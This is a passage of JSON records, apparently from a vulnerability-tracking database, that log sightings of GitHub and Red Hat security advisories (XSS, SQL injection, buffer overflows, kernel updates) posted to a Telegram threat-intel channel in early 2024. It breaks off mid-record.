{"uuid": "8ec41024-6d60-4ee3-857d-2bad4a037fdd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VPH5-2Q33-7R9H", "type": "seen", "source": "https://t.me/ctinow/173143", "content": "https://ift.tt/otY8xc7\n[GHSA-vph5-2q33-7r9h] Arbitrary file read vulnerability in Git server Plugin can lead to RCE", "creation_timestamp": "2024-01-24T22:57:34.000000Z"}, {"uuid": "3bf3fec9-c41d-4f57-8af4-b7746c1fd560", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0432", "type": "seen", "source": "https://t.me/ctinow/172890", "content": "https://ift.tt/8N4DuYO\nRHSA-2024:0432: Important: kernel security and bug fix update", "creation_timestamp": "2024-01-24T16:21:36.000000Z"}, {"uuid": "fc52c45e-0001-4144-ac51-20bd7fe5044e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0433", "type": "seen", "source": "https://t.me/ctinow/172889", "content": "https://ift.tt/kLOhR6X\nRHSA-2024:0433: Moderate: linux-firmware security update", "creation_timestamp": "2024-01-24T16:21:35.000000Z"}, {"uuid": "75b7600a-22c3-436b-b780-f5dc51028d91", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0434", "type": "seen", "source": "https://t.me/ctinow/172888", "content": "https://ift.tt/bHJ7Qro\nRHSA-2024:0434: Moderate: curl security update", "creation_timestamp": "2024-01-24T16:21:34.000000Z"}, {"uuid": "8ab6833b-4361-4d51-9b35-fd11aa3b8c0d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C38C-C8MH-VQ68", "type": "seen", "source": "https://t.me/ctinow/165927", "content": "https://ift.tt/VtnYB69\n[GHSA-c38c-c8mh-vq68] Pimcore Customer Data Framework Improper Access Control allows unprivileged user to access customers duplicates list", "creation_timestamp": "2024-01-10T16:36:51.000000Z"}, {"uuid": "79b71f09-d0ab-4b4a-8f26-cc026eeae26d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G273-WPPX-82W4", "type": "seen", "source": "https://t.me/ctinow/165926", "content": "https://ift.tt/FQogjCH\n[GHSA-g273-wppx-82w4] Pimcore Customer Data Framework Improper Access Control allows unprivileged user to access GDPR extracts", "creation_timestamp": "2024-01-10T16:36:50.000000Z"}, {"uuid": "5bd3dcac-14d2-4951-a6af-e40e8cc4bf7f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P4RX-7WVG-FWRC", "type": "seen", "source": "https://t.me/ctinow/165925", "content": "https://ift.tt/97h5plm\n[GHSA-p4rx-7wvg-fwrc] CRI-O's pods can break out of resource confinement on cgroupv2", "creation_timestamp": "2024-01-10T16:36:48.000000Z"}, {"uuid": "ef178fa6-714f-48a2-9a81-428344afc971", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-686W-5M7M-54VC", "type": "seen", "source": "https://t.me/ctinow/165827", "content": "https://ift.tt/3zTxGn2\nCVE-2023-50246 | jq 1.7 buffer overflow (GHSA-686w-5m7m-54vc)", "creation_timestamp": "2024-01-10T14:36:42.000000Z"}, {"uuid": "26b940ad-c919-4dc3-9e44-f08d7e6b4e38", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7HMR-442F-QC8J", "type": "seen", "source": "https://t.me/ctinow/165826", "content": "https://ift.tt/b1G7VXB\nCVE-2023-50268 | jq = 1.7 decNumber buffer overflow (GHSA-7hmr-442f-qc8j)", "creation_timestamp": "2024-01-10T14:36:41.000000Z"}, {"uuid": "2d4752b9-9a9e-42d3-b438-94672a4fc02c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G22G-P6Q2-X39V", "type": "seen", "source": "https://t.me/ctinow/167865", "content": "https://ift.tt/xd8s7Wr\nCVE-2023-47118 | ClickHouse Service Port 9000 heap-based overflow (GHSA-g22g-p6q2-x39v)", "creation_timestamp": "2024-01-13T15:56:20.000000Z"}, {"uuid": "0ffdb119-0321-4389-b2ab-f35f909a9fbc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J3M6-GVM8-MHVW", "type": "seen", "source": "https://t.me/ctinow/172299", "content": "https://ift.tt/zlsntUq\n[GHSA-j3m6-gvm8-mhvw] No permission checks for editing/deleting records with CSV import form", "creation_timestamp": "2024-01-23T21:12:25.000000Z"}, {"uuid": "a99c219f-8cd3-4dac-afe5-4ee27760fa6f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2JXW-4HM4-6W87", "type": "seen", "source": "https://t.me/ctinow/172298", "content": "https://ift.tt/BacAd5W\n[GHSA-2jxw-4hm4-6w87] SQL injection in llama-index", "creation_timestamp": "2024-01-23T21:12:24.000000Z"}, {"uuid": "81432467-7190-4e95-909a-47f18fa43f7a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C8V3-JHV9-4PPC", "type": "seen", "source": "https://t.me/ctinow/172314", "content": "https://ift.tt/K8RQM09\n[GHSA-c8v3-jhv9-4ppc] Use-after-free when setting the locale", "creation_timestamp": "2024-01-23T21:26:23.000000Z"}, {"uuid": "75cefe91-b376-436e-8b12-9e2e6b0650d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V435-PFJ6-68R3", "type": "seen", "source": "https://t.me/ctinow/172313", "content": "https://ift.tt/NJGnTLs\n[GHSA-v435-pfj6-68r3] Cross-site Scripting in JFinal", "creation_timestamp": "2024-01-23T21:26:22.000000Z"}, {"uuid": "8872f30b-9abb-4d31-a490-4ba6fe8d5709", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V9WR-2XRG-V7W8", "type": "seen", "source": "https://t.me/ctinow/172312", "content": "https://ift.tt/3hRKT16\n[GHSA-v9wr-2xrg-v7w8] Cross-site Scripting in beetl-bbs", "creation_timestamp": "2024-01-23T21:26:21.000000Z"}, {"uuid": "6ab5cf79-b319-4fbc-91e9-27cdf54cd16c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RWHH-6X83-84V6", "type": "seen", "source": "https://t.me/ctinow/172311", "content": "https://ift.tt/HYMAg39\n[GHSA-rwhh-6x83-84v6] Cross-site Scripting in Apache superset", "creation_timestamp": "2024-01-23T21:26:20.000000Z"}, {"uuid": "3f4cd8cf-0056-46dd-9189-168883f7f0f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7Q8P-9953-PXVR", "type": "seen", "source": "https://t.me/ctinow/172310", "content": "https://ift.tt/Sd12KqZ\n[GHSA-7q8p-9953-pxvr] Remote Command Execution in SOFARPC", "creation_timestamp": "2024-01-23T21:26:18.000000Z"}, {"uuid": "e6893021-3648-4919-a5db-a78c6aacc808", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G9C8-WH35-G75F", "type": "seen", "source": "https://t.me/ctinow/172309", "content": "https://ift.tt/G18jv5P\nCVE-2023-50253 | labring laf up to 1.0.0-beta.13 information disclosure (GHSA-g9c8-wh35-g75f)", "creation_timestamp": "2024-01-23T21:26:17.000000Z"}, {"uuid": "e49626ef-07b7-43f6-b595-0ef5da6373d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-23RX-79R7-6CPX", "type": "seen", "source": "https://t.me/ctinow/172066", "content": "https://ift.tt/OmGc3tQ\n[GHSA-23rx-79r7-6cpx] Sandbox escape in Artemis Java Test Sandbox", "creation_timestamp": "2024-01-23T15:47:06.000000Z"}, {"uuid": "25275783-b527-4119-b67c-cd798bdb57ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3P77-WG4C-QM24", "type": "seen", "source": "https://t.me/ctinow/172065", "content": "https://ift.tt/1PpWCe0\n[GHSA-3p77-wg4c-qm24] Exposure of sensitive information in ClickHouse", "creation_timestamp": "2024-01-23T15:47:05.000000Z"}, {"uuid": "a292d5cd-2afc-49b7-a1b8-49f32fac856b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GVC7-GJRW-HJ65", "type": "seen", "source": "https://t.me/ctinow/172064", "content": "https://ift.tt/eYxgPZR\n[GHSA-gvc7-gjrw-hj65] Improper Verification of Cryptographic Signature in aws-encryption-sdk-java", "creation_timestamp": "2024-01-23T15:47:04.000000Z"}, {"uuid": "028e3c32-03c4-44ba-83cf-efb52d2ff88f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HFJ8-63C8-RMFW", "type": "seen", "source": "https://t.me/ctinow/172063", "content": "https://ift.tt/Q9wxBr0\n[GHSA-hfj8-63c8-rmfw] Inefficient Algorithmic Complexity in com.upokecenter:cbor", "creation_timestamp": "2024-01-23T15:47:03.000000Z"}, {"uuid": "f2eaad21-1c7e-4b9a-8f5f-4e663c84db8d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WC6F-QJXC-622V", "type": "seen", "source": "https://t.me/ctinow/172062", "content": "https://ift.tt/Ghn2QoV\n[GHSA-wc6f-qjxc-622v] JavaScript execution via malicious molfiles (XSS)", "creation_timestamp": "2024-01-23T15:47:02.000000Z"}, {"uuid": "714d16ef-9ac2-48dc-b318-e93957875a0b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HV2G-GXX4-FWXP", "type": "seen", "source": "https://t.me/ctinow/162851", "content": "https://ift.tt/rKQjRBU\nCVE-2023-48225 | labring laf up to 1.0.0-beta12 envFrom information disclosure (GHSA-hv2g-gxx4-fwxp)", "creation_timestamp": "2024-01-04T09:07:05.000000Z"}, {"uuid": "3e369978-d604-496a-bdd6-024c0b83a040", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6XMX-85X3-4CV2", "type": "seen", "source": "https://t.me/ctinow/162842", "content": "https://ift.tt/K7UFpVr\nCVE-2023-49279 | Umbraco CMS up to 7.15.10/8.18.8/10.6.x/11.4.x/12.1.x SVG File cross site scripting (GHSA-6xmx-85x3-4cv2)", "creation_timestamp": "2024-01-04T08:41:41.000000Z"}, {"uuid": "690d3113-8de1-4a18-92ee-402388c1068d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-356J-HG45-X525", "type": "seen", "source": "https://t.me/ctinow/166718", "content": "https://ift.tt/vtbkUs6\nCVE-2023-50448 | activeadmin Gem prior 2.12.0 on Ruby CSV Export information disclosure (GHSA-356j-hg45-x525)", "creation_timestamp": "2024-01-11T18:31:27.000000Z"}, {"uuid": "f683c608-cfa4-404d-a0dd-f6460fbf4cdc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0381", "type": "seen", "source": "https://t.me/ctinow/172240", "content": "https://ift.tt/Wty1TMg\nRHSA-2024:0381: Important: kpatch-patch security update", "creation_timestamp": "2024-01-23T19:17:43.000000Z"}, {"uuid": "f8917888-257a-4f27-8e9f-003b679426ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0089", "type": "seen", "source": "https://t.me/ctinow/164898", "content": "https://ift.tt/1Q7RJHj\nRHSA-2024:0089: Important: kpatch-patch security update", "creation_timestamp": "2024-01-09T10:16:53.000000Z"}, {"uuid": "9d679303-395f-402f-9070-e2b67bfe2771", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0376", "type": "seen", "source": "https://t.me/ctinow/172242", "content": "https://ift.tt/ZvyjcYK\nRHSA-2024:0376: Important: kpatch-patch security update", "creation_timestamp": "2024-01-23T19:17:45.000000Z"}, {"uuid": "b73c9662-935a-42c1-9bf2-bc4c589df6ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0378", "type": "seen", "source": "https://t.me/ctinow/172241", "content": "https://ift.tt/IWTJzel\nRHSA-2024:0378: Important: kpatch-patch security update", "creation_timestamp": "2024-01-23T19:17:44.000000Z"}, {"uuid": "3ed63b4d-f65c-4d83-83e7-7f94aa97f220", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RJQ5-W47X-X359", "type": "seen", "source": "https://t.me/ctinow/172074", "content": "https://ift.tt/YH4rFux\n[GHSA-rjq5-w47x-x359] @hono/node-server cannot handle \"double dots\" in URL", "creation_timestamp": "2024-01-23T15:56:34.000000Z"}, {"uuid": "d6d8c4ed-f325-4948-a645-0888290f6834", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-75MC-3PJC-727Q", "type": "seen", "source": "https://t.me/ctinow/162861", "content": "https://ift.tt/pNoZwIx\nCVE-2023-50263 | Nautobot up to 1.6.6/2.0.5 /files/get/ name information disclosure (GHSA-75mc-3pjc-727q)", "creation_timestamp": "2024-01-04T09:41:51.000000Z"}, {"uuid": "ec402895-e3ca-490d-b8b0-52e63d6c4174", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0009", "type": "seen", "source": "https://t.me/ctinow/161907", "content": "https://ift.tt/xAQmMX6\nRHSA-2024:0009: Important: xorg-x11-server security update", "creation_timestamp": "2024-01-02T17:17:43.000000Z"}, {"uuid": "0a2f4608-fa6d-4d41-ade7-5e50cd2c7f78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0010", "type": "seen", "source": "https://t.me/ctinow/161906", "content": "https://ift.tt/A1PqOcB\nRHSA-2024:0010: Important: tigervnc security update", "creation_timestamp": "2024-01-02T17:17:42.000000Z"}, {"uuid": "1765106e-bc90-4cf3-a00d-1362d5ddf845", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V98M-398X-269R", "type": "seen", "source": "https://t.me/ctinow/161854", "content": "https://ift.tt/tH1mdKZ\nCVE-2023-48313 | Umbraco CMS up to 10.8.0/12.3.3 cross site scripting (GHSA-v98m-398x-269r)", "creation_timestamp": "2024-01-02T16:11:17.000000Z"}, {"uuid": "6e5e20b7-79da-44c9-845e-2cd64430b784", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W3VP-JW9M-F9PM", "type": "seen", "source": "https://t.me/ctinow/161718", "content": "https://ift.tt/YhAwtq4\nCVE-2023-6193 | Cloudflare quiche up to 0.19.0 QUIC Path Validation resource consumption (GHSA-w3vp-jw9m-f9pm)", "creation_timestamp": "2024-01-02T12:41:15.000000Z"}, {"uuid": "c4b67fa6-26f2-412b-8ea1-de817f6e9935", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2268-98WH-QFHF", "type": "seen", "source": "https://t.me/ctinow/160679", "content": "https://ift.tt/ONde68u\n[GHSA-2268-98wh-qfhf] JLine vulnerable to out of memory error", "creation_timestamp": "2023-12-29T21:17:08.000000Z"}, {"uuid": "7d5670fa-c2d0-467d-8c2c-edb8bede3ce7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WJC4-73Q6-GV3M", "type": "seen", "source": "https://t.me/ctinow/162569", "content": "https://ift.tt/AlqmIkr\n[GHSA-wjc4-73q6-gv3m] plotly.js prototype pollution vulnerability", "creation_timestamp": "2024-01-03T20:46:23.000000Z"}, {"uuid": "adc590d9-b517-483f-a5b9-c64a6404c803", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3QX3-6HXR-J2CH", "type": "seen", "source": "https://t.me/ctinow/181602", "content": "https://ift.tt/B35TEao\n[GHSA-3qx3-6hxr-j2ch] eza Potential Heap Overflow Vulnerability for AArch64", "creation_timestamp": "2024-02-08T19:57:07.000000Z"}, {"uuid": "14691189-b215-4aff-94a4-c35b94254b0c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-833M-37F7-JQ55", "type": "seen", "source": "https://t.me/ctinow/181601", "content": "https://ift.tt/MtA4hmC\n[GHSA-833m-37f7-jq55] Rancher API Server Cross-site Scripting Vulnerability", "creation_timestamp": "2024-02-08T19:57:06.000000Z"}, {"uuid": "27c85462-77e1-4a6f-9160-761f2022d77c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C85R-FWC7-45VC", "type": "seen", "source": "https://t.me/ctinow/181599", "content": "https://ift.tt/UpHtu45\n[GHSA-c85r-fwc7-45vc] Rancher permissions on 'namespaces' in any API group grants 'edit' permissions on namespaces in 'core'", "creation_timestamp": "2024-02-08T19:57:03.000000Z"}, {"uuid": "42564fd2-43a4-48b3-a3ec-9bdf37bb4675", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C352-X843-GGPQ", "type": "seen", "source": "https://t.me/ctinow/181598", "content": "https://ift.tt/Ray1Gt9\n[GHSA-c352-x843-ggpq] XXL-JOB vulnerable to Server-Side Request Forgery", "creation_timestamp": "2024-02-08T19:57:02.000000Z"}, {"uuid": "c2b9ea55-4fd9-4c08-b3f5-f140dcf13215", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HVP4-VRV2-8WRQ", "type": "seen", "source": "https://t.me/ctinow/181593", "content": "https://ift.tt/LJlW1NI\n[GHSA-hvp4-vrv2-8wrq] Kinto Attachment's attachments can be replaced on read-only records", "creation_timestamp": "2024-02-08T19:46:13.000000Z"}, {"uuid": "ac765aa2-19d2-457b-bdd9-c659c115924c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MQF8-4CQM-P83X", "type": "seen", "source": "https://t.me/ctinow/181592", "content": "https://ift.tt/SpkehED\n[GHSA-mqf8-4cqm-p83x] Liferay Portal allows attackers to discover the existence of sites", "creation_timestamp": "2024-02-08T19:46:12.000000Z"}, {"uuid": "fe1c321b-bd5d-400d-8cf0-5ac3acee3ba7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-57WX-M636-G3G8", "type": "seen", "source": "https://t.me/ctinow/170466", "content": "https://ift.tt/3FVjHEz\n[GHSA-57wx-m636-g3g8] Go package github.com/notaryproject/notation configured with permissive trust policies potentially susceptible to rollback attack from compromised registry", "creation_timestamp": "2024-01-19T23:21:59.000000Z"}, {"uuid": "eab9aa38-bf59-4edb-90ab-b16d255413f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4M77-CMPX-VJC4", "type": "seen", "source": "https://t.me/ctinow/170422", "content": "https://ift.tt/tjrVFHD\n[GHSA-4m77-cmpx-vjc4] JupyterLab vulnerable to SXSS in Markdown Preview", "creation_timestamp": "2024-01-19T21:36:31.000000Z"}, {"uuid": "3509a980-edc6-4420-8272-708767858155", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0500", "type": "seen", "source": "https://t.me/ctinow/173651", "content": "https://ift.tt/Nn3vPXw\nRHSA-2024:0500: Moderate: openssl security update", "creation_timestamp": "2024-01-25T18:16:16.000000Z"}, {"uuid": "d545e881-15b9-4276-8fc6-e7f24a528643", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-44CC-43RP-5947", "type": "seen", "source": "https://t.me/ctinow/170421", "content": "https://ift.tt/vmFtVaG\n[GHSA-44cc-43rp-5947] JupyterLab vulnerable to potential authentication and CSRF tokens leak", "creation_timestamp": "2024-01-19T21:36:30.000000Z"}, {"uuid": "f528ad2e-7168-4bd6-b958-aca211fa79d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4113", "type": "seen", "source": "https://t.me/ctinow/168841", "content": "https://ift.tt/FGp97if\nCVE-2019-17631 | Eclipse OpenJ9 0.15/0.16 Privilege Check permission assignment (RHSA-2019:4113)", "creation_timestamp": "2024-01-16T15:11:27.000000Z"}, {"uuid": "54784b1b-54e5-4e3c-b0cd-1e7e997ac3e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:3239", "type": "seen", "source": "https://t.me/ctinow/168766", "content": "https://ift.tt/HV5B4AI\nCVE-2019-11253 | Kubernetes up to 1.0-1.12/1.13.11/1.14.7/1.15.4/1.16.1 API Server JSON Payload input validation (RHSA-2019:3239)", "creation_timestamp": "2024-01-16T12:06:53.000000Z"}, {"uuid": "f936abea-2a7d-459d-b5a0-9b1b4edd6937", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0255", "type": "seen", "source": "https://t.me/ctinow/168456", "content": "https://ift.tt/aBHYkvX\nRHSA-2024:0255: Important: .NET 6.0 security, bug fix, and enhancement update", "creation_timestamp": "2024-01-15T17:21:08.000000Z"}, {"uuid": "7c0ba88f-e43d-4046-a7e1-4e3c57b79e2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C24V-8RFC-W8VW", "type": "seen", "source": "https://t.me/ctinow/170445", "content": "https://ift.tt/6adwVhp\n[GHSA-c24v-8rfc-w8vw] Vite dev server option `server.fs.deny` can be bypassed when hosted on case-insensitive filesystem", "creation_timestamp": "2024-01-19T23:06:48.000000Z"}, {"uuid": "c066f07b-c403-41e9-a705-eeaa5bf1ee8d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-58J9-J2FJ-V8F4", "type": "seen", "source": "https://t.me/ctinow/170427", "content": "https://ift.tt/o5PANBF\n[GHSA-58j9-j2fj-v8f4] SurrealDB vulnerable to Uncontrolled CPU Consumption via WebSocket Interface", "creation_timestamp": "2024-01-19T21:46:10.000000Z"}, {"uuid": "92fa7893-74b4-4d14-934e-85b833087ece", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0530", "type": "seen", "source": "https://t.me/ctinow/173758", "content": "https://ift.tt/hqeHTJM\nRHSA-2024:0530: Important: Red Hat build of Cryostat security update", "creation_timestamp": "2024-01-25T20:16:33.000000Z"}, {"uuid": "49239e31-eea2-4ec6-b01d-85b46f6d85a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0499", "type": "seen", "source": "https://t.me/ctinow/173583", "content": "https://ift.tt/Amw4KTk\nRHSA-2024:0499: Moderate: libssh security update", "creation_timestamp": "2024-01-25T17:17:13.000000Z"}, {"uuid": "b2068cde-e376-4751-889c-3e9126550bf9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WG2X-RV86-MMPX", "type": "seen", "source": "https://t.me/ctinow/170456", "content": "https://ift.tt/Ar5DQZk\n[GHSA-wg2x-rv86-mmpx] SPV Merkle proof malleability allows the maintainer to prove invalid transactions", "creation_timestamp": "2024-01-19T23:17:14.000000Z"}, {"uuid": "6f758953-f001-40c3-a7ac-f6fcad28807a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2Q8V-3GQQ-4F8P", "type": "seen", "source": "https://t.me/ctinow/170302", "content": "https://ift.tt/N2IZpKt\n[GHSA-2q8v-3gqq-4f8p] concat built-in can corrupt memory in vyper", "creation_timestamp": "2024-01-19T17:31:38.000000Z"}, {"uuid": "5ff49266-d060-44fb-8775-3146f2ee1632", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WPPC-F5G8-VX36", "type": "seen", "source": "https://t.me/ctinow/169974", "content": "https://ift.tt/yUsBz96\nCVE-2024-22403 | NextCloud Server up to 27.x OAuth2 violation of secure design principles (GHSA-wppc-f5g8-vx36)", "creation_timestamp": "2024-01-18T22:26:25.000000Z"}, {"uuid": "6413b1a5-d10b-46a4-88c4-a066682071ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8MCR-VFFR-JWXV", "type": "seen", "source": "https://t.me/ctinow/169657", "content": "https://ift.tt/qDEYXly\nCVE-2023-50259 | pymedusa Medusa up to 1.0.18 POST Request handler.py testslack slack_webhook server-side request forgery (GHSA-8mcr-vffr-jwxv)", "creation_timestamp": "2024-01-18T10:41:34.000000Z"}, {"uuid": "3d63e013-a6a5-4a03-ba93-056321a2b3c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0278", "type": "seen", "source": "https://t.me/ctinow/169293", "content": "https://ift.tt/GSYgZNf\nRHSA-2024:0278: Moderate: Red Hat AMQ Broker 7.11.5 release and security update", "creation_timestamp": "2024-01-17T15:17:31.000000Z"}, {"uuid": "8213df40-6b22-4ac6-b35e-a3900906d667", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": 